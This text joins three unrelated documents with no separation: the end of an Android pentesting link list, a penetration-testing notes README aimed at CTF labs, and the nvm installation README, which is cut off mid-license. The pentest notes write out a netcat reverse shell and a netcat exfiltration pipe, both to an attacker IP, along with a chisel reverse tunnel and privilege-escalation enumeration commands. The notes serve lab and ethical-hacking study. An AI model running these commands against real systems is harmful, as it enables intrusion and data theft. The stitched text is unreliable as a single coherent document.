bugbounty hunters and ethical hackers](https://github.com/vincentcox/StaCoAn) #### Dynamic Analysis * [Mobile-Security-Framework MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF) * [Magisk v20.2 - Root & Universal Systemless Interface](https://github.com/topjohnwu/Magisk5) * [Runtime Mobile Security (RMS) - is a powerful web interface that helps you to manipulate Android and iOS Apps at Runtime](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security) * [Droid-FF - Android File Fuzzing Framework](https://github.com/antojoseph/droid-ff) * [Drozer](https://github.com/FSecureLABS/drozer) * [Inspeckage](https://github.com/ac-pm/Inspeckage) * [PATDroid - Collection of tools and data structures for analyzing Android applications](https://github.com/mingyuan-xia/PATDroid) * [Radare2 - Unix-like reverse engineering framework and commandline tools](https://github.com/radareorg/radare2) * [Cutter - Free and Open Source RE Platform powered by radare2](https://cutter.re/) * [ByteCodeViewer - Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger)](https://bytecodeviewer.com/) #### Online APK Analyzers * [Oversecured](https://oversecured.com/) * [Android Observatory APK Scan](https:/androidobservatory.org/upload) * [AndroTotal](http://andrototal.org/) * [VirusTotal](https://www.virustotal.com/#/home/upload) * [Scan Your APK](https://scanyourapk.com/) * [AVC Undroid](https://undroid.av-comparatives.org/index.php) * [OPSWAT](https://metadefender.opswat.com/#!/) * [ImmuniWeb Mobile App Scanner](https://www.htbridge.com/mobile/) * [Ostor Lab](https://www.ostorlab.co/scan/mobile/) * [Quixxi](https://quixxisecurity.com/) * [TraceDroid](http://tracedroid.few.vu.nl/submit.php) * [Visual Threat](http://www.visualthreat.com/UIupload.action) * [App Critique](https://appcritique.boozallen.com/) * [Jotti's malware scan](https://virusscan.jotti.org/) * [kaspersky scanner](https://opentip.kaspersky.com/) #### Online APK Decompiler * [Android APK Decompiler](http://www.decompileandroid.com/) * [Java Decompiler APk](http://www.javadecompilers.com/apk) * [APK DECOMPILER APP](https://www.apkdecompilers.com/) * [DeAPK is an open-source, online APK decompiler ](https://deapk.vaibhavpandey.com/) * [apk and dex decompilation back to Java source code](http://www.decompiler.com/) * [APK Decompiler Tools](https://apk.tools/tools/apk-decompiler/alternateURL/) # Labs * [OVAA (Oversecured Vulnerable Android App)](https://github.com/oversecured/ovaa) * [DIVA (Damn insecure and vulnerable App)](https://github.com/payatu/diva-android) * [OWASP Security Shepherd ](https://github.com/OWASP/SecurityShepherd) * [Damn Vulnerable Hybrid Mobile App (DVHMA)](https://github.com/logicalhacking/DVHMA) * [OWASP-mstg(UnCrackable Mobile Apps)](https://github.com/OWASP/owasp-mstg/tree/master/Crackmes) * [VulnerableAndroidAppOracle](https://github.com/dan7800/VulnerableAndroidAppOracle) * [Android InsecureBankv2](https://github.com/dineshshetty/Android-InsecureBankv2) * [Purposefully Insecure and Vulnerable Android Application (PIIVA)](https://github.com/htbridge/pivaa) * [Sieve app(An android application which exploits through android components)](https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk) * [DodoVulnerableBank(Insecure Vulnerable Android Application that helps to learn hacing and securing apps)](https://github.com/CSPF-Founder/DodoVulnerableBank) * [Digitalbank(Android Digital Bank Vulnerable Mobile App)](https://github.com/CyberScions/Digitalbank) * [AppKnox Vulnerable Application](https://github.com/appknox/vulnerable-application) * [Vulnerable Android Application](https://github.com/Lance0312/VulnApp) * [Android Security Labs](https://github.com/SecurityCompass/AndroidLabs) * [Android-security Sandbox](https://github.com/rafaeltoledo/android-security) * [VulnDroid(CTF Style Vulnerable Android App)](https://github.com/shahenshah99/VulnDroid) * [FridaLab](https://rossmarks.uk/blog/fridalab/) * [Santoku Linux - Mobile Security VM](https://santoku-linux.com/) * [AndroL4b - A Virtual Machine For Assessing Android applications, Reverse Engineering and Malware Analysis](https://github.com/sh4hin/Androl4b) # Talks * [One Step Ahead of Cheaters -- Instrumenting Android Emulators](https://www.youtube.com/watch?v=L3AniAxp_G4) * [Vulnerable Out of the Box: An Evaluation of Android Carrier Devices](https://www.youtube.com/watch?v=R2brQvQeTvM) * [Rock appround the clock: Tracking malware developers by Android](https://www.youtube.com/watch?v=wd5OU9NvxjU) * [Chaosdata - Ghost in the Droid: Possessing Android Applications with ParaSpectre](https://www.youtube.com/watch?v=ohjTWylMGEA) * [Remotely Compromising Android and iOS via a Bug in Broadcom's Wi-Fi Chipsets](https://www.youtube.com/watch?v=TDk2RId8LFo) * [Honey, I Shrunk the Attack Surface – Adventures in Android Security Hardening](https://www.youtube.com/watch?v=EkL1sDMXRVk) * [Hide Android Applications in Images](https://www.youtube.com/watch?v=hajOlvLhYJY) * [Scary Code in the Heart of Android](https://www.youtube.com/watch?v=71YP65UANP0) * [Fuzzing Android: A Recipe For Uncovering Vulnerabilities Inside System Components In Android](https://www.youtube.com/watch?v=q_HibdrbIxo) * [Unpacking the Packed Unpacker: Reverse Engineering an Android Anti-Analysis Native Library](https://www.youtube.com/watch?v=s0Tqi7fuOSU) * [Android FakeID Vulnerability Walkthrough](https://www.youtube.com/watch?v=5eJYCucZ-Tc) * [Unleashing D* on Android Kernel Drivers](https://www.youtube.com/watch?v=1XavjjmfZAY) * [The Smarts Behind Hacking Dumb Devices](https://www.youtube.com/watch?v=yU1BrY1ZB2o) * [Overview of common Android app vulnerabilities](https://www.bugcrowd.com/resources/webinars/overview-of-common-android-app-vulnerabilities/) * [Android security architecture](https://www.youtube.com/watch?v=3asW-nBU-JU) * [Get the Ultimate Privilege of Android Phone](https://vimeo.com/335948808) # Misc * [Android Malware Adventures](https://docs.google.com/presentation/d/1pYB522E71hXrp4m3fL3E3fnAaOIboJKqpbyE5gSsOes/edit) * [Android-Reports-and-Resources](https://github.com/B3nac/Android-Reports-and-Resources/blob/master/README.md) * [Hands On Mobile API Security](https://hackernoon.com/hands-on-mobile-api-security-get-rid-of-client-secrets-a79f111b6844) * [Android Penetration Testing Courses](https://medium.com/mobile-penetration-testing/android-penetration-testing-courses-4effa36ac5ed) * [Lesser-known Tools for Android Application PenTesting](https://captmeelo.com/pentest/2019/12/30/lesser-known-tools-for-android-pentest.html) * [android-device-check - a set of scripts to check Android device security configuration](https://github.com/nelenkov/android-device-check) * [apk-mitm - a CLI application that prepares Android APK files for HTTPS inspection](https://github.com/shroudedcode/apk-mitm) * [Andriller - is software utility with a collection of forensic tools for smartphones](https://github.com/den4uk/andriller) * [Dexofuzzy: Android malware similarity clustering method using opcode sequence-Paper](https://www.virusbulletin.com/virusbulletin/2019/11/dexofuzzy-android-malware-similarity-clustering-method-using-opcode-sequence/) * [Chasing the Joker](https://docs.google.com/presentation/d/1sFGAERaNRuEORaH06MmZKeFRqpJo1ol1xFieUa1X_OA/edit#slide=id.p1) * [Side Channel Attacks in 4G and 5G Cellular Networks-Slides](https://i.blackhat.com/eu-19/Thursday/eu-19-Hussain-Side-Channel-Attacks-In-4G-And-5G-Cellular-Networks.pdf) * [Shodan.io-mobile-app for Android](https://github.com/PaulSec/Shodan.io-mobile-app) * [Popular Android Malware 2018](https://github.com/sk3ptre/AndroidMalware_2018) * [Popular Android Malware 2019](https://github.com/sk3ptre/AndroidMalware_2019) * [Popular Android Malware 2020](https://github.com/sk3ptre/AndroidMalware_2020) # Bug Bounty & Writeup * [Hacker101 CTF: Android Challenge Writeups](https://medium.com/bugbountywriteup/hacker101-ctf-android-challenge-writeups-f830a382c3ce) * [Arbitrary code execution on Facebook for Android through download feature](https://medium.com/@dPhoeniixx/arbitrary-code-execution-on-facebook-for-android-through-download-feature-fb6826e33e0f) * [RCE via Samsung Galaxy Store App](https://labs.f-secure.com/blog/samsung-s20-rce-via-samsung-galaxy-store-app/) # Cheat Sheet * [Mobile Application Penetration Testing Cheat Sheet](https://github.com/sh4hin/MobileApp-Pentest-Cheatsheet) * [ADB (Android Debug Bridge) Cheat Sheet](https://www.mobileqaengineer.com/blog/2020/2/4/adb-android-debug-bridge-cheat-sheet) * [Frida Cheatsheet and Code Snippets for Android](https://erev0s.com/blog/frida-code-snippets-for-android/) # Checklist * [Android Pentesting Checklist](https://mobexler.com/checklist.htm#android) # Bug Bounty Report * [List of Android Hackerone disclosed reports](https://github.com/B3nac/Android-Reports-and-Resources) * [How to report security issues](https://source.android.com/security/overview/updates-resources#report-issues)# Android-pentest
# PT𓀮EH **Notes about Penetration Testing and Ethical Hackin.** ![crosshair](writeups/overthewire/media/crosshair.png) --- [REED](https://github.com/bmedicke/REED) | PTEH --- # toc <!-- vim-markdown-toc GFM --> * [the pentest process](#the-pentest-process) * [pre-engagement interactions](#pre-engagement-interactions) * [information gathering](#information-gathering) * [threat modeling](#threat-modeling) * [vulnerability analysis](#vulnerability-analysis) * [exploitation](#exploitation) * [post-exploitation](#post-exploitation) * [reporting](#reporting) * [CTF and wargame writeups](#ctf-and-wargame-writeups) * [Web Application Security](#web-application-security) * [enumeration](#enumeration) * [webapps](#webapps) * [foothold and pivot](#foothold-and-pivot) * [kali](#kali) * [linux](#linux) * [windows](#windows) * [privilege escalation](#privilege-escalation) * [linux](#linux-1) * [windows](#windows-1) * [bonus](#bonus) * [oneliners](#oneliners) * [kali config](#kali-config) * [kali tips](#kali-tips) * [basics](#basics) * [windows](#windows-2) * [linux](#linux-2) * [tools](#tools) * [find](#find) * [less](#less) * [nc](#nc) * [openssl](#openssl) * [socat and ncat](#socat-and-ncat) * [ssh](#ssh) * [Burp Suite](#burp-suite) * [sqlmap](#sqlmap) * [thc-hydra](#thc-hydra) <!-- vim-markdown-toc --> # the pentest process This section follows the structure of the [Penetration Testing Execution Standard](http://www.pentest-standard.org/index.php/Main_Page) (PTES): ## pre-engagement interactions ## information gathering ## threat modeling ## vulnerability analysis ## exploitation ## post-exploitation ## reporting Documentation should start as soon as the pentenst starts to avoid situations where you need additional information but have already lost access to the target. Creating a mindmap is a good idea to get a clear but complete picture. * useful tools: * [Freemind](http://freemind.sourceforge.net/) allows for attaching files, such as port scans, to nodes # CTF and wargame writeups * https://overthewire.org/ (linux) * **[overthewire writeups](writeups/overthewire)** (in repo link) * https://underthewire.tech/ (powershell) * https://hackthebox.eu/ * **[hackthebox writeups](writeups/hackthebox)** (in repo link) * https://www.hacker101.com/ * https://microcorruption.com/ * http://smashthestack.org/ * https://exploit-exercises.lains.space/ (mirror, original is down) # Web Application Security * **[webapp](webapp)** (in repo link) # enumeration > port scanning ```sh nmap -v $host | tee 00.nmap # fast initial scan. nmap -A -v -sS -oA 01 -T4 $host nmap -A -v -sS -oA 02 -p- $host ``` > finding exploits * google * https://www.rapid7.com/db/ * https://exploit-db.com ```sh # CLI utility for https://exploit-db.com database: searchsploit motd # search exploits for message of the day. searchsploit -x 1235.c # look at specific exploit. ``` ## webapps * if it's a webapp/CMS/etc.: * `dirb` it * check out `robots.txt` * try admin:admin credentials * try default credentials * `hydra` * look for a copyright date in the header/footer * usually not automatically generated * try some vhosts by modifying the header with [Burp Suite](#burp-suite) # foothold and pivot ## kali * don't forget about: * `/usr/share/webshells` * `/usr/share/windows-resources` * `/usr/share/wordlists` > serving files ```sh # via webserver: python3 -m http.server 80 # via samba: impacket-smbserver -smb2server share . ``` > reverse shells and port bindings ```sh # netcat rlwrap nc -lnvp 42424 # chisel # start the client first: chisel client -v 10.10.14.69 R:8888:127.0.0.1:8888 # local: 8888 # remote: 127.0.0.1:8888 chisel server -v -p 12345 --reverse # connect with: # plink ``` ## linux > information gathering ```sh uname -a # os info. id # user and groups. ps -p $$ # name of current process. ip a # or ifconfig. netstat -tulpen # connections. lsblk # devices. locate / # list of probably every file on the system. # depending on under which user updatedb ran. find / -perm -4000 2>/dev/null # setuid executables. # if any of these have an exploit they can be used # to elevate privileges to root. # pretty print of home files: find /home -type f -printf "%f\t%p\t%u\t%g\t%m\n" 2>/dev/null | column -t | tee files dpkg -l # list of installed packages (and versions) ``` > downloading files * on Linux you should save your files to `/dev/shm` (the ramdisk) * type `mount | grep shm` to see that it is a tmpfs filesystem * it gets wiped on unmount (you could clean up with `umount /dev/shm`) * other choices: * `/tmp` gets wiped on reboot (might be tmpfs) * `/var/tmp` persists between reboots (not tmpfs) ```sh # linux download: wget $h/file curl $h/file -so file ``` > info gathering with external tools ```sh ./linpeas.sh -a ``` ## windows > information gathering ```sh dir /q whoami /all systeminfo set tasklist ipconfig /all netstat -nao | findstr 127 | findstr LISTEN # services powershell -c "Get-Service | Format-Table -AutoSize" sc # stop/start service net start # old (from DOS) ``` > downloading files ```sh # powershell: iwr hostname/file.exe -outf file.exe # long version: Invoke-WebRequest hostname/file.exe -OutFile file.exe ``` > info gathering with external tools ```sh linpeas.exe linpeas.bat # if exe fails. ``` # privilege escalation ## linux * Kernel 2.6.22 to 4.8.3 Dirty Cow (`dirty.c`) ## windows # bonus ## oneliners ```sh # upgrade shell: python -c 'import pty;pty.spawn("bash")' # fix environment: export TERM=linux # logging a reverse shell locally: script # stop with ^D. breaks in vi. finicky. # get a temp dir: cd $(mktemp -d) # get local connections: netstat -tulpen ``` ## kali config ```sh # pip2 for new Kalis: curl -s https://bootstrap.pypa.io/get-pip.py | python2 pip2 install requests colorama # for the exploit above. pip2 install xlrd # for windows exploit suggester. apt install ncdu pip3 install cve_searchsploit # https://github.com/andreafioraldi/cve_searchsploit # update it: cve_searchsploit -u cd /opt git clone 'https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git' cd Windows-Exploit-Suggester python windows-exploit-suggester.py --update python windows-exploit-suggester.py --help # chisel cd /opt wget 'https://github.com/jpillora/chisel/releases/download/v1.7.1/chisel_1.7.1_windows_386.gz' wget 'https://github.com/jpillora/chisel/releases/download/v1.7.1/chisel_1.7.1_linux_386.gz' gunzip chisel* mv chisel*windows* chisel.exe ``` ```sh # metasploit sudo service postgresql start sudo msfdb init msfconsole # db_status ``` ## kali tips * ranger disables previews for root (enable them on a by case basis with `zp`) ## basics ### windows ```sh # windows get cmd.exe help: help # powershell cd $env:tmp # cmd.exe cd %tmp% ``` ### linux ```sh umask -S # file creation mask. # help umask (linux) sudo -l # list allowed and forbidden commands. sudo -u kali whoami # run whoami as kali. base64 # great for exfiltration without inet. # then just copy the text from the terminal. # -d to decode it again. # use pipes or pass a filename. strings -e # different encoding options. find . # get list of all files in dir. # great for lot's of files/folders with spaces # where autocompletion is broken. xdotool # fake keyboard mouse in X. ``` # tools ## find ```sh # look for binaries with SUID: find / -perm -4000 2>/dev/null ``` ## less > read raw control chars (colors). ```sh ./linpeas.sh | less -R ``` * less uses many vim bindings * press `h` for help * press `s` to save to a file * `Gg` scrolls to the bottom and back up, now you can use `^g` to show progress! ## nc > reverse shell ```sh # attacker: nc -lnvp 12345 # attackee: nc -e /bin/bash 10.10.14.69 12345 # most nix. nc -e cmd.exe 10.10.14.69 12345 # windows. ``` > exfiltration by piping over the network ```sh # attacker: nc -lnvp 12345 > exfil_file # attackee: nc -q0 10.10.14.69 12345 < exfil_file # on both: md5sum exfil_file # and compare hashes to verify the transfer. ``` * commands this can be useful for: `dd`, `tar` (tar pipe) > check for open port ```sh nc -vvz localhost 443 # multiple nc -vzz localhost 80 8080 # or a range nc -vvz localhost 1-1024 2>&1 | grep -v refused ``` ## openssl * [man pages](https://www.openssl.org/docs/manmaster/man1/) * `man openssl` * `-help` flag for subcommands * for SSL connections: * `s_client` and `s_server` subcommands * `openssl s_client -connect localhost:443` * `openssl s_server` * for hashing: * `echo hello | openssl sha1` * `openssl md5 test_file` * for encoding: * `openssl base64 -in test_file` * for encryption: * `openssl chacha20` * `openssl aes256` ## socat and ncat * for encrypted shells/exfiltration ## ssh > local port forwarding ```sh ssh -N kali -L 0.0.0.0:8080:tabby:8080 -L 0.0.0.0:80:tabby:80 # binds tabby's 80 and 8080 to all interfaces on the executing server. ``` ## Burp Suite * [Burp Suite](burp) ## sqlmap ## thc-hydra
# Node Version Manager [![Build Status](https://travis-ci.org/creationix/nvm.svg?branch=master)][3] [![nvm version](https://img.shields.io/badge/version-v0.33.8-yellow.svg)][4] [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/684/badge)](https://bestpractices.coreinfrastructure.org/projects/684) <!-- START doctoc generated TOC please keep comment here to allow auto update --> <!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE --> ## Table of Contents - [Installation](#installation) - [Install script](#install-script) - [Verify installation](#verify-installation) - [Important Notes](#important-notes) - [Git install](#git-install) - [Manual Install](#manual-install) - [Manual upgrade](#manual-upgrade) - [Usage](#usage) - [Long-term support](#long-term-support) - [Migrating global packages while installing](#migrating-global-packages-while-installing) - [Default global packages from file while installing](#default-global-packages-from-file-while-installing) - [io.js](#iojs) - [System version of node](#system-version-of-node) - [Listing versions](#listing-versions) - [.nvmrc](#nvmrc) - [Deeper Shell Integration](#deeper-shell-integration) - [zsh](#zsh) - [Calling `nvm use` automatically in a directory with a `.nvmrc` file](#calling-nvm-use-automatically-in-a-directory-with-a-nvmrc-file) - [License](#license) - [Running tests](#running-tests) - [Bash completion](#bash-completion) - [Usage](#usage-1) - [Compatibility Issues](#compatibility-issues) - [Installing nvm on Alpine Linux](#installing-nvm-on-alpine-linux) - [Docker for development environment](#docker-for-development-environment) - [Problems](#problems) - [Mac OS "troubleshooting"](#mac-os-troubleshooting) <!-- END doctoc generated TOC please keep comment here to allow auto update --> ## Installation ### Install script To install or update nvm, you can use the [install script][2] using cURL: ```sh curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.8/install.sh | bash ``` or Wget: ```sh wget -qO- https://raw.githubusercontent.com/creationix/nvm/v0.33.8/install.sh | bash ``` <sub>The script clones the nvm repository to `~/.nvm` and adds the source line to your profile (`~/.bash_profile`, `~/.zshrc`, `~/.profile`, or `~/.bashrc`).</sub> ```sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm ``` You can customize the install source, directory, profile, and version using the `NVM_SOURCE`, `NVM_DIR`, `PROFILE`, and `NODE_VERSION` variables. Eg: `curl ... | NVM_DIR=/usr/local/nvm bash` for a global install. Ensure that the `NVM_DIR` does not contain a trailing slash. <sub>*NB. The installer can use `git`, `curl`, or `wget` to download `nvm`, whatever is available.*</sub> **Note:** On Linux, after running the install script, if you get `nvm: command not found` or see no feedback from your terminal after you type: ```sh command -v nvm ``` simply close your current terminal, open a new terminal, and try verifying again. **Note:** On OS X, if you get `nvm: command not found` after running the install script, one of the following might be the reason:- - your system may not have a [`.bash_profile file`] where the command is set up. Simply create one with `touch ~/.bash_profile` and run the install script again - you might need to restart your terminal instance. Try opening a new tab/window in your terminal and retry. If the above doesn't fix the problem, open your `.bash_profile` and add the following line of code: `source ~/.bashrc` - For more information about this issue and possible workarounds, please [refer here](https://github.com/creationix/nvm/issues/576) ### Verify installation To verify that nvm has been installed, do: ```sh command -v nvm ``` which should output 'nvm' if the installation was successful. Please note that `which nvm` will not work, since `nvm` is a sourced shell function, not an executable binary. ### Important Notes If you're running a system without prepackaged binary available, which means you're going to install nodejs or io.js from its source code, you need to make sure your system has a C++ compiler. For OS X, Xcode will work, for Debian/Ubuntu based GNU/Linux, the `build-essential` and `libssl-dev` packages work. **Note:** `nvm` does not support Windows (see [#284](https://github.com/creationix/nvm/issues/284)). Two alternatives exist, which are neither supported nor developed by us: - [nvm-windows](https://github.com/coreybutler/nvm-windows) - [nodist](https://github.com/marcelklehr/nodist) **Note:** `nvm` does not support [Fish] either (see [#303](https://github.com/creationix/nvm/issues/303)). Alternatives exist, which are neither supported nor developed by us: - [bass](https://github.com/edc/bass) allows you to use utilities written for Bash in fish shell - [fast-nvm-fish](https://github.com/brigand/fast-nvm-fish) only works with version numbers (not aliases) but doesn't significantly slow your shell startup - [plugin-nvm](https://github.com/derekstavis/plugin-nvm) plugin for [Oh My Fish](https://github.com/oh-my-fish/oh-my-fish), which makes nvm and its completions available in fish shell - [fnm](https://github.com/fisherman/fnm) - [fisherman](https://github.com/fisherman/fisherman)-based version manager for fish **Note:** We still have some problems with FreeBSD, because there is no official pre-built binary for FreeBSD, and building from source may need [patches](https://www.freshports.org/www/node/files/patch-deps_v8_src_base_platform_platform-posix.cc); see the issue ticket: - [[#900] [Bug] nodejs on FreeBSD may need to be patched ](https://github.com/creationix/nvm/issues/900) - [nodejs/node#3716](https://github.com/nodejs/node/issues/3716) **Note:** On OS X, if you do not have Xcode installed and you do not wish to download the ~4.3GB file, you can install the `Command Line Tools`. You can check out this blog post on how to just that: - [How to Install Command Line Tools in OS X Mavericks & Yosemite (Without Xcode)](http://osxdaily.com/2014/02/12/install-command-line-tools-mac-os-x/) **Note:** On OS X, if you have/had a "system" node installed and want to install modules globally, keep in mind that: - When using nvm you do not need `sudo` to globally install a module with `npm -g`, so instead of doing `sudo npm install -g grunt`, do instead `npm install -g grunt` - If you have an `~/.npmrc` file, make sure it does not contain any `prefix` settings (which is not compatible with nvm) - You can (but should not?) keep your previous "system" node install, but nvm will only be available to your user account (the one used to install nvm). This might cause version mismatches, as other users will be using `/usr/local/lib/node_modules/*` VS your user account using `~/.nvm/versions/node/vX.X.X/lib/node_modules/*` Homebrew installation is not supported. If you have issues with homebrew-installed `nvm`, please `brew uninstall` it, and install it using the instructions below, before filing an issue. **Note:** If you're using `zsh` you can easily install `nvm` as a zsh plugin. Install [`zsh-nvm`](https://github.com/lukechilds/zsh-nvm) and run `nvm upgrade` to upgrade. **Note:** Git versions before v1.7 may face a problem of cloning nvm source from GitHub via https protocol, and there is also different behavior of git before v1.6, and git prior to [v1.17.10](https://github.com/git/git/commit/5a7d5b683f869d3e3884a89775241afa515da9e7) can not clone tags, so the minimum required git version is v1.7.10. If you are interested in the problem we mentioned here, please refer to GitHub's [HTTPS cloning errors](https://help.github.com/articles/https-cloning-errors/) article. ### Git install If you have `git` installed (requires git v1.7.10+): 1. clone this repo in the root of your user profile - `cd ~/` from anywhere then `git clone https://github.com/creationix/nvm.git .nvm` 2. `cd ~/.nvm` and check out the latest version with `git checkout v0.33.8` 3. activate nvm by sourcing it from your shell: `. nvm.sh` Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login: (you may have to add to more than one of the above files) ```sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm [ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion ``` ### Manual Install For a fully manual install, create a folder somewhere in your filesystem with the `nvm.sh` file inside it. I put mine in `~/.nvm` and added the following to the `nvm.sh` file. ```sh export NVM_DIR="$HOME/.nvm" && ( git clone https://github.com/creationix/nvm.git "$NVM_DIR" cd "$NVM_DIR" git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" origin` ) && \. "$NVM_DIR/nvm.sh" ``` Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login: (you may have to add to more than one of the above files) ```sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm ``` ### Manual upgrade For manual upgrade with `git` (requires git v1.7.10+): 1. change to the `$NVM_DIR` 1. pull down the latest changes 1. check out the latest version 1. activate the new version ```sh ( cd "$NVM_DIR" git fetch origin git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" origin` ) && \. "$NVM_DIR/nvm.sh" ``` ## Usage To download, compile, and install the latest release of node, do this: ```sh nvm install node ``` And then in any new shell just use the installed version: ```sh nvm use node ``` Or you can just run it: ```sh nvm run node --version ``` Or, you can run any arbitrary command in a subshell with the desired version of node: ```sh nvm exec 4.2 node --version ``` You can also get the path to the executable to where it was installed: ```sh nvm which 5.0 ``` In place of a version pointer like "0.10" or "5.0" or "4.2.1", you can use the following special default aliases with `nvm install`, `nvm use`, `nvm run`, `nvm exec`, `nvm which`, etc: - `node`: this installs the latest version of [`node`](https://nodejs.org/en/) - `iojs`: this installs the latest version of [`io.js`](https://iojs.org/en/) - `stable`: this alias is deprecated, and only truly applies to `node` `v0.12` and earlier. Currently, this is an alias for `node`. - `unstable`: this alias points to `node` `v0.11` - the last "unstable" node release, since post-1.0, all node versions are stable. (in semver, versions communicate breakage, not stability). ### Long-term support Node has a [schedule](https://github.com/nodejs/LTS#lts_schedule) for long-term support (LTS) You can reference LTS versions in aliases and `.nvmrc` files with the notation `lts/*` for the latest LTS, and `lts/argon` for LTS releases from the "argon" line, for example. In addition, the following commands support LTS arguments: - `nvm install --lts` / `nvm install --lts=argon` / `nvm install 'lts/*'` / `nvm install lts/argon` - `nvm uninstall --lts` / `nvm uninstall --lts=argon` / `nvm uninstall 'lts/*'` / `nvm uninstall lts/argon` - `nvm use --lts` / `nvm use --lts=argon` / `nvm use 'lts/*'` / `nvm use lts/argon` - `nvm exec --lts` / `nvm exec --lts=argon` / `nvm exec 'lts/*'` / `nvm exec lts/argon` - `nvm run --lts` / `nvm run --lts=argon` / `nvm run 'lts/*'` / `nvm run lts/argon` - `nvm ls-remote --lts` / `nvm ls-remote --lts=argon` `nvm ls-remote 'lts/*'` / `nvm ls-remote lts/argon` - `nvm version-remote --lts` / `nvm version-remote --lts=argon` / `nvm version-remote 'lts/*'` / `nvm version-remote lts/argon` Any time your local copy of `nvm` connects to https://nodejs.org, it will re-create the appropriate local aliases for all available LTS lines. These aliases (stored under `$NVM_DIR/alias/lts`), are managed by `nvm`, and you should not modify, remove, or create these files - expect your changes to be undone, and expect meddling with these files to cause bugs that will likely not be supported. ### Migrating global packages while installing If you want to install a new version of Node.js and migrate npm packages from a previous version: ```sh nvm install node --reinstall-packages-from=node ``` This will first use "nvm version node" to identify the current version you're migrating packages from. Then it resolves the new version to install from the remote server and installs it. Lastly, it runs "nvm reinstall-packages" to reinstall the npm packages from your prior version of Node to the new one. You can also install and migrate npm packages from specific versions of Node like this: ```sh nvm install 6 --reinstall-packages-from=5 nvm install v4.2 --reinstall-packages-from=iojs ``` ### Default global packages from file while installing If you have a list of default packages you want installed every time you install a new version we support that too. You can add anything npm would accept as a package argument on the command line. ```sh # $NVM_DIR/default-packages rimraf [email protected] stevemao/left-pad ``` ### io.js If you want to install [io.js](https://github.com/iojs/io.js/): ```sh nvm install iojs ``` If you want to install a new version of io.js and migrate npm packages from a previous version: ```sh nvm install iojs --reinstall-packages-from=iojs ``` The same guidelines mentioned for migrating npm packages in Node.js are applicable to io.js. ### System version of node If you want to use the system-installed version of node, you can use the special default alias "system": ```sh nvm use system nvm run system --version ``` ### Listing versions If you want to see what versions are installed: ```sh nvm ls ``` If you want to see what versions are available to install: ```sh nvm ls-remote ``` To restore your PATH, you can deactivate it: ```sh nvm deactivate ``` To set a default Node version to be used in any new shell, use the alias 'default': ```sh nvm alias default node ``` To use a mirror of the node binaries, set `$NVM_NODEJS_ORG_MIRROR`: ```sh export NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist nvm install node NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist nvm install 4.2 ``` To use a mirror of the io.js binaries, set `$NVM_IOJS_ORG_MIRROR`: ```sh export NVM_IOJS_ORG_MIRROR=https://iojs.org/dist nvm install iojs-v1.0.3 NVM_IOJS_ORG_MIRROR=https://iojs.org/dist nvm install iojs-v1.0.3 ``` `nvm use` will not, by default, create a "current" symlink. Set `$NVM_SYMLINK_CURRENT` to "true" to enable this behavior, which is sometimes useful for IDEs. Note that using `nvm` in multiple shell tabs with this environment variable enabled can cause race conditions. ### .nvmrc You can create a `.nvmrc` file containing a node version number (or any other string that `nvm` understands; see `nvm --help` for details) in the project root directory (or any parent directory). Afterwards, `nvm use`, `nvm install`, `nvm exec`, `nvm run`, and `nvm which` will use the version specified in the `.nvmrc` file if no version is supplied on the command line. For example, to make nvm default to the latest 5.9 release, the latest LTS version, or the latest node version for the current directory: ```sh $ echo "5.9" > .nvmrc $ echo "lts/*" > .nvmrc # to default to the latest LTS version $ echo "node" > .nvmrc # to default to the latest version ``` Then when you run nvm: ```sh $ nvm use Found '/path/to/project/.nvmrc' with version <5.9> Now using node v5.9.1 (npm v3.7.3) ``` `nvm use` et. al. will traverse directory structure upwards from the current directory looking for the `.nvmrc` file. In other words, running `nvm use` et. al. in any subdirectory of a directory with an `.nvmrc` will result in that `.nvmrc` being utilized. The contents of a `.nvmrc` file **must** be the `<version>` (as described by `nvm --help`) followed by a newline. No trailing spaces are allowed, and the trailing newline is required. ### Deeper Shell Integration You can use [`avn`](https://github.com/wbyoung/avn) to deeply integrate into your shell and automatically invoke `nvm` when changing directories. `avn` is **not** supported by the `nvm` development team. Please [report issues to the `avn` team](https://github.com/wbyoung/avn/issues/new). If you prefer a lighter-weight solution, the recipes below have been contributed by `nvm` users. They are **not** supported by the `nvm` development team. We are, however, accepting pull requests for more examples. #### zsh ##### Calling `nvm use` automatically in a directory with a `.nvmrc` file Put this into your `$HOME/.zshrc` to call `nvm use` automatically whenever you enter a directory that contains an `.nvmrc` file with a string telling nvm which node to `use`: ```zsh # place this after nvm initialization! autoload -U add-zsh-hook load-nvmrc() { local node_version="$(nvm version)" local nvmrc_path="$(nvm_find_nvmrc)" if [ -n "$nvmrc_path" ]; then local nvmrc_node_version=$(nvm version "$(cat "${nvmrc_path}")") if [ "$nvmrc_node_version" = "N/A" ]; then nvm install elif [ "$nvmrc_node_version" != "$node_version" ]; then nvm use fi elif [ "$node_version" != "$(nvm version default)" ]; then echo "Reverting to nvm default version" nvm use default fi } add-zsh-hook chpwd load-nvmrc load-nvmrc ``` ## License nvm is released under the MIT license. Copyright (C) 2010 Tim Caswell and Jordan Harband Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished 